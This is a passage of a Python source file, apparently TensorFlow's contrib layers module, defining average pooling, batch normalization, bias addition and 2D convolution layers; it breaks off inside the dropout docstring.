text stringlengths 4 1.02M | meta dict |
|---|---|
"""Higher level ops for building layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import six
from tensorflow.contrib.framework.python.ops import add_arg_scope
from tensorflow.contrib.framework.python.ops import variables
from tensorflow.contrib.layers.python.layers import initializers
from tensorflow.contrib.layers.python.layers import utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.training import moving_averages
# TODO(b/28426988): Replace legacy_* fns migrated from slim.
# TODO(b/28426988): Remove legacy_* when all uses have migrated to new API.
__all__ = ['avg_pool2d',
'batch_norm',
'bias_add',
'conv2d',
'conv2d_in_plane',
'conv2d_transpose',
'convolution2d',
'convolution2d_in_plane',
'convolution2d_transpose',
'dropout',
'flatten',
'fully_connected',
'layer_norm',
'linear',
'max_pool2d',
'one_hot_encoding',
'relu',
'relu6',
'repeat',
'separable_conv2d',
'separable_convolution2d',
'softmax',
'stack',
'unit_norm',
'legacy_fully_connected',
'legacy_linear',
'legacy_relu']
DATA_FORMAT_NCHW = 'NCHW'
DATA_FORMAT_NHWC = 'NHWC'
@add_arg_scope
def avg_pool2d(inputs,
kernel_size,
stride=2,
padding='VALID',
data_format=DATA_FORMAT_NHWC,
outputs_collections=None,
scope=None):
"""Adds a 2D average pooling op.
It is assumed that the pooling is done per image but not in batch or channels.
Args:
inputs: A 4-D tensor of shape `[batch_size, height, width, channels]` if
`data_format` is `NHWC`, and `[batch_size, channels, height, width]` if
`data_format` is `NCHW`.
kernel_size: A list of length 2: [kernel_height, kernel_width] of the
pooling kernel over which the op is computed. Can be an int if both
values are the same.
stride: A list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: The padding method, either 'VALID' or 'SAME'.
data_format: A string. `NHWC` (default) and `NCHW` are supported.
outputs_collections: The collections to which the outputs are added.
scope: Optional scope for name_scope.
Returns:
A `Tensor` representing the results of the pooling operation.
Raises:
ValueError: if `data_format` is neither `NHWC` nor `NCHW`.
"""
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
with ops.name_scope(scope, 'AvgPool2D', [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
if data_format == DATA_FORMAT_NHWC:
ksize = [1, kernel_h, kernel_w, 1]
strides = [1, stride_h, stride_w, 1]
else:
ksize = [1, 1, kernel_h, kernel_w]
strides = [1, 1, stride_h, stride_w]
outputs = nn.avg_pool(inputs,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
def _fused_batch_norm(
inputs,
decay=0.999,
center=True,
scale=False,
epsilon=0.001,
activation_fn=None,
param_initializers=None,
updates_collections=ops.GraphKeys.UPDATE_OPS,
is_training=True,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
data_format=DATA_FORMAT_NHWC,
scope=None):
"""Adds a Batch Normalization layer from http://arxiv.org/abs/1502.03167.
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Can be used as a normalizer function for conv2d and fully_connected.
Note: When is_training is True the moving_mean and moving_variance need to be
updated, by default the update_ops are placed in `tf.GraphKeys.UPDATE_OPS` so
they need to be added as a dependency to the `train_op`, example:
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
if update_ops:
updates = tf.group(*update_ops)
total_loss = control_flow_ops.with_dependencies([updates], total_loss)
One can set updates_collections=None to force the updates in place, but that
can have speed penalty, specially in distributed settings.
Args:
inputs: a tensor with 2 or more dimensions, where the first dimension has
`batch_size`. The normalization is over all but the last dimension if
`data_format` is `NHWC` and the second dimension if `data_format` is
`NCHW`.
decay: decay for the moving average.
center: If True, subtract `beta`. If False, `beta` is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
epsilon: small float added to variance to avoid dividing by zero.
activation_fn: activation function, default set to None to skip it and
maintain a linear activation.
param_initializers: optional initializers for beta, gamma, moving mean and
moving variance.
updates_collections: collections to collect the update ops for computation.
The updates_ops need to be executed with the train_op.
If None, a control dependency would be added to make sure the updates are
computed in place.
is_training: whether or not the layer is in training mode. In training mode
it would accumulate the statistics of the moments into `moving_mean` and
`moving_variance` using an exponential moving average with the given
`decay`. When it is not in training mode then it would use the values of
the `moving_mean` and the `moving_variance`.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional collections for the variables.
outputs_collections: collections to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
data_format: A string. `NHWC` (default) and `NCHW` are supported.
scope: Optional scope for `variable_scope`.
Returns:
A `Tensor` representing the output of the operation.
Raises:
ValueError: if `data_format` is neither `NHWC` nor `NCHW`.
ValueError: if the rank of `inputs` is undefined.
ValueError: if rank or last dimension of `inputs` is undefined.
"""
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
with variable_scope.variable_scope(
scope, 'BatchNorm', [inputs], reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
inputs_shape = inputs.get_shape()
inputs_rank = inputs_shape.ndims
if inputs_rank is None:
raise ValueError('Inputs %s has undefined rank.' % inputs.name)
dtype = inputs.dtype.base_dtype
if data_format == DATA_FORMAT_NHWC:
params_shape = inputs_shape[-1:]
else:
params_shape = inputs_shape[1:2]
if not params_shape.is_fully_defined():
raise ValueError('Inputs %s has undefined last dimension %s.' %
(inputs.name, params_shape))
# Allocate parameters for the beta and gamma of the normalization.
trainable_beta = trainable and center
beta_collections = utils.get_variable_collections(variables_collections,
'beta')
if not param_initializers:
param_initializers = {}
beta_initializer = param_initializers.get('beta',
init_ops.zeros_initializer)
beta = variables.model_variable(
'beta',
shape=params_shape,
dtype=dtype,
initializer=beta_initializer,
collections=beta_collections,
trainable=trainable_beta)
trainable_gamma = trainable and scale
gamma_collections = utils.get_variable_collections(variables_collections,
'gamma')
gamma_initializer = param_initializers.get('gamma',
init_ops.ones_initializer)
gamma = variables.model_variable(
'gamma',
shape=params_shape,
dtype=dtype,
initializer=gamma_initializer,
collections=gamma_collections,
trainable=trainable_gamma)
# Create moving_mean and moving_variance variables and add them to the
# appropiate collections.
moving_mean_collections = utils.get_variable_collections(
variables_collections, 'moving_mean')
moving_mean_initializer = param_initializers.get('moving_mean',
init_ops.zeros_initializer)
moving_mean = variables.model_variable(
'moving_mean',
shape=params_shape,
dtype=dtype,
initializer=moving_mean_initializer,
trainable=False,
collections=moving_mean_collections)
moving_variance_collections = utils.get_variable_collections(
variables_collections, 'moving_variance')
moving_variance_initializer = param_initializers.get(
'moving_variance', init_ops.ones_initializer)
moving_variance = variables.model_variable(
'moving_variance',
shape=params_shape,
dtype=dtype,
initializer=moving_variance_initializer,
trainable=False,
collections=moving_variance_collections)
# If `is_training` doesn't have a constant value, because it is a `Tensor`,
# a `Variable` or `Placeholder` then is_training_value will be None and
# `needs_moments` will be true.
is_training_value = utils.constant_value(is_training)
need_moments = is_training_value is None or is_training_value
if need_moments:
# Calculate the moments based on the individual batch.
def _fused_batch_norm_training():
return nn.fused_batch_norm(
inputs, gamma, beta, epsilon=epsilon, data_format=data_format)
def _fused_batch_norm_inference():
return nn.fused_batch_norm(
inputs,
gamma,
beta,
mean=moving_mean,
variance=moving_variance,
epsilon=epsilon,
is_training=False,
data_format=data_format)
outputs, mean, variance = utils.smart_cond(is_training,
_fused_batch_norm_training,
_fused_batch_norm_inference)
moving_vars_fn = lambda: (moving_mean, moving_variance)
if updates_collections is None:
def _force_updates():
"""Internal function forces updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay)
with ops.control_dependencies(
[update_moving_mean, update_moving_variance]):
return array_ops.identity(mean), array_ops.identity(variance)
mean, variance = utils.smart_cond(is_training, _force_updates,
moving_vars_fn)
with ops.control_dependencies([mean, variance]):
outputs = array_ops.identity(outputs)
else:
def _delay_updates():
"""Internal function that delay updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay)
return update_moving_mean, update_moving_variance
update_mean, update_variance = utils.smart_cond(is_training,
_delay_updates,
moving_vars_fn)
ops.add_to_collections(updates_collections, update_mean)
ops.add_to_collections(updates_collections, update_variance)
# Use computed moments during training and moving_vars otherwise.
vars_fn = lambda: (mean, variance)
mean, variance = utils.smart_cond(is_training, vars_fn, moving_vars_fn)
else:
mean, variance = moving_mean, moving_variance
outputs, _, _ = nn.fused_batch_norm(
inputs,
gamma,
beta,
mean=moving_mean,
variance=moving_variance,
epsilon=epsilon,
is_training=False,
data_format=data_format)
outputs.set_shape(inputs_shape)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def batch_norm(
inputs,
decay=0.999,
center=True,
scale=False,
epsilon=0.001,
activation_fn=None,
param_initializers=None,
updates_collections=ops.GraphKeys.UPDATE_OPS,
is_training=True,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
batch_weights=None,
fused=False,
data_format=DATA_FORMAT_NHWC,
scope=None):
"""Adds a Batch Normalization layer from http://arxiv.org/abs/1502.03167.
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Can be used as a normalizer function for conv2d and fully_connected.
Note: When is_training is True the moving_mean and moving_variance need to be
updated, by default the update_ops are placed in `tf.GraphKeys.UPDATE_OPS` so
they need to be added as a dependency to the `train_op`, example:
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
if update_ops:
updates = tf.group(*update_ops)
total_loss = control_flow_ops.with_dependencies([updates], total_loss)
One can set updates_collections=None to force the updates in place, but that
can have speed penalty, specially in distributed settings.
Args:
inputs: a tensor with 2 or more dimensions, where the first dimension has
`batch_size`. The normalization is over all but the last dimension if
`data_format` is `NHWC` and the second dimension if `data_format` is
`NCHW`.
decay: decay for the moving average.
center: If True, subtract `beta`. If False, `beta` is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
epsilon: small float added to variance to avoid dividing by zero.
activation_fn: activation function, default set to None to skip it and
maintain a linear activation.
param_initializers: optional initializers for beta, gamma, moving mean and
moving variance.
updates_collections: collections to collect the update ops for computation.
The updates_ops need to be executed with the train_op.
If None, a control dependency would be added to make sure the updates are
computed in place.
is_training: whether or not the layer is in training mode. In training mode
it would accumulate the statistics of the moments into `moving_mean` and
`moving_variance` using an exponential moving average with the given
`decay`. When it is not in training mode then it would use the values of
the `moving_mean` and the `moving_variance`.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional collections for the variables.
outputs_collections: collections to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
batch_weights: An optional tensor of shape `[batch_size]`,
containing a frequency weight for each batch item. If present,
then the batch normalization uses weighted mean and
variance. (This can be used to correct for bias in training
example selection.)
fused: Use nn.fused_batch_norm if True, nn.batch_normalization otherwise.
data_format: A string. `NHWC` (default) and `NCHW` are supported.
scope: Optional scope for `variable_scope`.
Returns:
A `Tensor` representing the output of the operation.
Raises:
ValueError: if `batch_weights` is not None and `fused` is True.
ValueError: if `data_format` is neither `NHWC` nor `NCHW`.
ValueError: if `data_format` is `NCHW` while `fused` is False.
ValueError: if the rank of `inputs` is undefined.
ValueError: if rank or last dimension of `inputs` is undefined.
"""
if fused:
if batch_weights is not None:
raise ValueError('Weighted mean and variance is not currently '
'supported for fused batch norm.')
return _fused_batch_norm(
inputs,
decay=decay,
center=center,
scale=scale,
epsilon=epsilon,
activation_fn=activation_fn,
param_initializers=param_initializers,
updates_collections=updates_collections,
is_training=is_training,
reuse=reuse,
variables_collections=variables_collections,
outputs_collections=outputs_collections,
trainable=trainable,
data_format=data_format,
scope=scope)
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
if data_format == DATA_FORMAT_NCHW:
raise ValueError('data_format must be NHWC if fused is False.')
with variable_scope.variable_scope(scope, 'BatchNorm', [inputs],
reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
inputs_shape = inputs.get_shape()
inputs_rank = inputs_shape.ndims
if inputs_rank is None:
raise ValueError('Inputs %s has undefined rank.' % inputs.name)
dtype = inputs.dtype.base_dtype
if batch_weights is not None:
batch_weights = ops.convert_to_tensor(batch_weights)
inputs_shape[0:1].assert_is_compatible_with(batch_weights.get_shape())
# Reshape batch weight values so they broadcast across inputs.
nshape = [-1] + [1 for _ in range(inputs_rank - 1)]
batch_weights = array_ops.reshape(batch_weights, nshape)
axis = list(range(inputs_rank - 1))
params_shape = inputs_shape[-1:]
if not params_shape.is_fully_defined():
raise ValueError('Inputs %s has undefined last dimension %s.' % (
inputs.name, params_shape))
# Allocate parameters for the beta and gamma of the normalization.
beta, gamma = None, None
if not param_initializers:
param_initializers = {}
if center:
beta_collections = utils.get_variable_collections(variables_collections,
'beta')
beta_initializer = param_initializers.get('beta',
init_ops.zeros_initializer)
beta = variables.model_variable('beta',
shape=params_shape,
dtype=dtype,
initializer=beta_initializer,
collections=beta_collections,
trainable=trainable)
if scale:
gamma_collections = utils.get_variable_collections(variables_collections,
'gamma')
gamma_initializer = param_initializers.get('gamma',
init_ops.ones_initializer)
gamma = variables.model_variable('gamma',
shape=params_shape,
dtype=dtype,
initializer=gamma_initializer,
collections=gamma_collections,
trainable=trainable)
# Create moving_mean and moving_variance variables and add them to the
# appropiate collections.
moving_mean_collections = utils.get_variable_collections(
variables_collections, 'moving_mean')
moving_mean_initializer = param_initializers.get('moving_mean',
init_ops.zeros_initializer)
moving_mean = variables.model_variable(
'moving_mean',
shape=params_shape,
dtype=dtype,
initializer=moving_mean_initializer,
trainable=False,
collections=moving_mean_collections)
moving_variance_collections = utils.get_variable_collections(
variables_collections, 'moving_variance')
moving_variance_initializer = param_initializers.get(
'moving_variance', init_ops.ones_initializer)
moving_variance = variables.model_variable(
'moving_variance',
shape=params_shape,
dtype=dtype,
initializer=moving_variance_initializer,
trainable=False,
collections=moving_variance_collections)
# If `is_training` doesn't have a constant value, because it is a `Tensor`,
# a `Variable` or `Placeholder` then is_training_value will be None and
# `needs_moments` will be true.
is_training_value = utils.constant_value(is_training)
need_moments = is_training_value is None or is_training_value
if need_moments:
# Calculate the moments based on the individual batch.
if batch_weights is None:
# Use a copy of moving_mean as a shift to compute more reliable moments.
shift = math_ops.add(moving_mean, 0)
mean, variance = nn.moments(inputs, axis, shift=shift)
else:
mean, variance = nn.weighted_moments(inputs, axis, batch_weights)
moving_vars_fn = lambda: (moving_mean, moving_variance)
if updates_collections is None:
def _force_updates():
"""Internal function forces updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay)
with ops.control_dependencies([update_moving_mean,
update_moving_variance]):
return array_ops.identity(mean), array_ops.identity(variance)
mean, variance = utils.smart_cond(is_training,
_force_updates,
moving_vars_fn)
else:
def _delay_updates():
"""Internal function that delay updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay)
return update_moving_mean, update_moving_variance
update_mean, update_variance = utils.smart_cond(is_training,
_delay_updates,
moving_vars_fn)
ops.add_to_collections(updates_collections, update_mean)
ops.add_to_collections(updates_collections, update_variance)
# Use computed moments during training and moving_vars otherwise.
vars_fn = lambda: (mean, variance)
mean, variance = utils.smart_cond(is_training, vars_fn, moving_vars_fn)
else:
mean, variance = moving_mean, moving_variance
# Compute batch_normalization.
outputs = nn.batch_normalization(inputs, mean, variance, beta, gamma,
epsilon)
outputs.set_shape(inputs_shape)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def bias_add(inputs,
activation_fn=None,
initializer=init_ops.zeros_initializer,
regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a bias to the inputs.
Can be used as a normalizer function for conv2d and fully_connected.
Args:
inputs: a tensor of with at least rank 2 and value for the last dimension,
e.g. `[batch_size, depth]`, `[None, None, None, depth]`.
activation_fn: activation function, default set to None to skip it and
maintain a linear activation.
initializer: An initializer for the bias, defaults to 0.
regularizer: A regularizer like the result of
`l1_regularizer` or `l2_regularizer`.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional collections for the variables.
outputs_collections: collections to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for variable_scope.
Returns:
a tensor representing the result of adding biases to the inputs.
"""
with variable_scope.variable_scope(scope, 'BiasAdd', [inputs],
reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
dtype = inputs.dtype.base_dtype
num_features = utils.last_dimension(inputs.get_shape(), min_rank=2)
biases_collections = utils.get_variable_collections(variables_collections,
'biases')
biases = variables.model_variable('biases',
shape=[num_features,],
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(inputs, biases)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def convolution2d(inputs,
num_outputs,
kernel_size,
stride=1,
padding='SAME',
data_format=DATA_FORMAT_NHWC,
rate=1,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a 2D convolution followed by an optional batch_norm layer.
`convolution2d` creates a variable called `weights`, representing the
convolutional kernel, that is convolved with the `inputs` to produce a
`Tensor` of activations. If a `normalizer_fn` is provided (such as
`batch_norm`), it is then applied. Otherwise, if `normalizer_fn` is
None and a `biases_initializer` is provided then a `biases` variable would be
created and added the activations. Finally, if `activation_fn` is not `None`,
it is applied to the activations as well.
Performs a'trous convolution with input stride equal to rate if rate is
greater than one.
Args:
inputs: a 4-D tensor of shape `[batch_size, height, width, channels]` if
`data_format` is `NHWC`, and `[batch_size, channels, height, width]` if
`data_format` is `NCHW`.
num_outputs: integer, the number of output filters.
kernel_size: a list of length 2 `[kernel_height, kernel_width]` of
of the filters. Can be an int if both values are the same.
stride: a list of length 2 `[stride_height, stride_width]`.
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: one of `VALID` or `SAME`.
data_format: A string. `NHWC` (default) and `NCHW` are supported.
rate: integer. If less than or equal to 1, a standard convolution is used.
If greater than 1, than the a'trous convolution is applied and `stride`
must be set to 1, `data_format` must be set to `NHWC`.
activation_fn: activation function, set to None to skip it and maintain
a linear activation.
normalizer_fn: normalization function to use instead of `biases`. If
`normalizer_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
default set to None for no normalizer function
normalizer_params: normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional list of collections for all the variables or
a dictionary containing a different list of collection per variable.
outputs_collections: collection to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for `variable_scope`.
Returns:
a tensor representing the output of the operation.
Raises:
ValueError: if `data_format` is neither `NHWC` nor `NCHW`.
ValueError: if `rate` is larger than one and `data_format` is `NCHW`.
ValueError: if both `rate` and `stride` are larger than one.
"""
with variable_scope.variable_scope(scope, 'Conv', [inputs],
reuse=reuse) as sc:
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
if rate > 1 and data_format == DATA_FORMAT_NCHW:
raise ValueError('If rate > 1, data_format must be NHWC')
inputs = ops.convert_to_tensor(inputs)
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
if rate > 1 and (stride_h > 1 or stride_w > 1):
raise ValueError('Only one of rate or stride can be larger than one')
if data_format == DATA_FORMAT_NHWC:
num_filters_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
else:
num_filters_in = inputs.get_shape().dims[1]
weights_shape = [kernel_h, kernel_w,
num_filters_in, num_outputs]
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
weights = variables.model_variable('weights',
shape=weights_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
collections=weights_collections,
trainable=trainable)
if rate > 1:
outputs = nn.atrous_conv2d(inputs, weights, rate, padding=padding)
else:
if data_format == DATA_FORMAT_NHWC:
strides = [1, stride_h, stride_w, 1]
else:
strides = [1, 1, stride_h, stride_w]
outputs = nn.conv2d(
inputs, weights, strides, padding=padding, data_format=data_format)
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_outputs,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(outputs, biases, data_format=data_format)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def convolution2d_in_plane(
inputs,
kernel_size,
stride=1,
padding='SAME',
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Performs the same in-plane convolution to each channel independently.
This is useful for performing various simple channel-independent convolution
operations such as image gradients:
image = tf.constant(..., shape=(16, 240, 320, 3))
vert_gradients = layers.conv2d_in_plane(image,
kernel=[1, -1],
kernel_size=[2, 1])
horz_gradients = layers.conv2d_in_plane(image,
kernel=[1, -1],
kernel_size=[1, 2])
Args:
inputs: a 4-D tensor with dimensions [batch_size, height, width, channels].
kernel_size: a list of length 2 holding the [kernel_height, kernel_width] of
of the pooling. Can be an int if both values are the same.
stride: a list of length 2 `[stride_height, stride_width]`.
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: the padding type to use, either 'SAME' or 'VALID'.
activation_fn: activation function, set to None to skip it and maintain
a linear activation.
normalizer_fn: normalization function to use instead of `biases`. If
`normalizer_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
default set to None for no normalizer function
normalizer_params: normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional list of collections for all the variables or
a dictionary containing a different list of collection per variable.
outputs_collections: collection to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for `variable_scope`.
Returns:
A `Tensor` representing the output of the operation.
"""
with variable_scope.variable_scope(
scope, 'ConvInPlane', [inputs], reuse=reuse) as sc:
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
num_filters_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
weights_shape = [kernel_h, kernel_w, 1, 1]
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
weights = variables.model_variable('weights',
shape=weights_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
collections=weights_collections,
trainable=trainable)
depthwise_weights = array_ops.tile(weights, [1, 1, num_filters_in, 1])
outputs = nn.depthwise_conv2d(inputs, depthwise_weights,
[1, stride_h, stride_w, 1], padding)
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_filters_in,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(outputs, biases)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def convolution2d_transpose(
inputs,
num_outputs,
kernel_size,
stride=1,
padding='SAME',
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a convolution2d_transpose with an optional batch normalization layer.
The function creates a variable called `weights`, representing the
kernel, that is convolved with the input. If `batch_norm_params` is `None`, a
second variable called 'biases' is added to the result of the operation.
Args:
inputs: a tensor of size [batch_size, height, width, channels].
num_outputs: integer, the number of output filters.
kernel_size: a list of length 2 holding the [kernel_height, kernel_width] of
of the filters. Can be an int if both values are the same.
stride: a list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: one of 'VALID' or 'SAME'.
activation_fn: activation function, set to None to skip it and maintain
a linear activation.
normalizer_fn: normalization function to use instead of `biases`. If
`normalizer_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
default set to None for no normalizer function
normalizer_params: normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional list of collections for all the variables or
a dictionary containing a different list of collection per variable.
outputs_collections: collection to add the outputs.
trainable: whether or not the variables should be trainable or not.
scope: Optional scope for variable_scope.
Returns:
a tensor representing the output of the operation.
Raises:
ValueError: if 'kernel_size' is not a list of length 2.
"""
with variable_scope.variable_scope(
scope, 'Conv2d_transpose', [inputs], reuse=reuse) as sc:
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
num_filters_in = utils.last_dimension(
inputs.get_shape(), min_rank=4)
weights_shape = [kernel_h, kernel_w, num_outputs, num_filters_in]
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
weights = variables.model_variable(
'weights',
shape=weights_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
trainable=trainable,
collections=weights_collections)
inputs_shape = array_ops.shape(inputs)
batch_size = inputs_shape[0]
height, width = inputs_shape[1], inputs_shape[2]
def get_deconv_dim(dim_size, stride_size, kernel_size, padding):
if isinstance(dim_size, ops.Tensor):
dim_size = math_ops.mul(dim_size, stride_size)
elif dim_size is not None:
dim_size *= stride_size
if padding == 'VALID' and dim_size is not None:
dim_size += max(kernel_size - stride_size, 0)
return dim_size
# Infer the dynamic output shape:
out_height = get_deconv_dim(height, stride_h, kernel_h, padding)
out_width = get_deconv_dim(width, stride_w, kernel_w, padding)
output_shape = array_ops.pack(
[batch_size, out_height, out_width, num_outputs])
outputs = nn.conv2d_transpose(inputs, weights, output_shape,
[1, stride_h, stride_w, 1],
padding=padding)
# Infer the static output shape:
out_shape = inputs.get_shape().as_list()
out_shape[-1] = num_outputs
out_shape[1] = get_deconv_dim(out_shape[1], stride_h, kernel_h, padding)
out_shape[2] = get_deconv_dim(out_shape[2], stride_w, kernel_w, padding)
outputs.set_shape(out_shape)
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_outputs,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections)
outputs = nn.bias_add(outputs, biases)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def dropout(inputs,
keep_prob=0.5,
noise_shape=None,
is_training=True,
outputs_collections=None,
scope=None):
"""Returns a dropout op applied to the input.
With probability `keep_prob`, outputs the input element scaled up by
`1 / keep_prob`, otherwise outputs `0`. The scaling is so that the expected
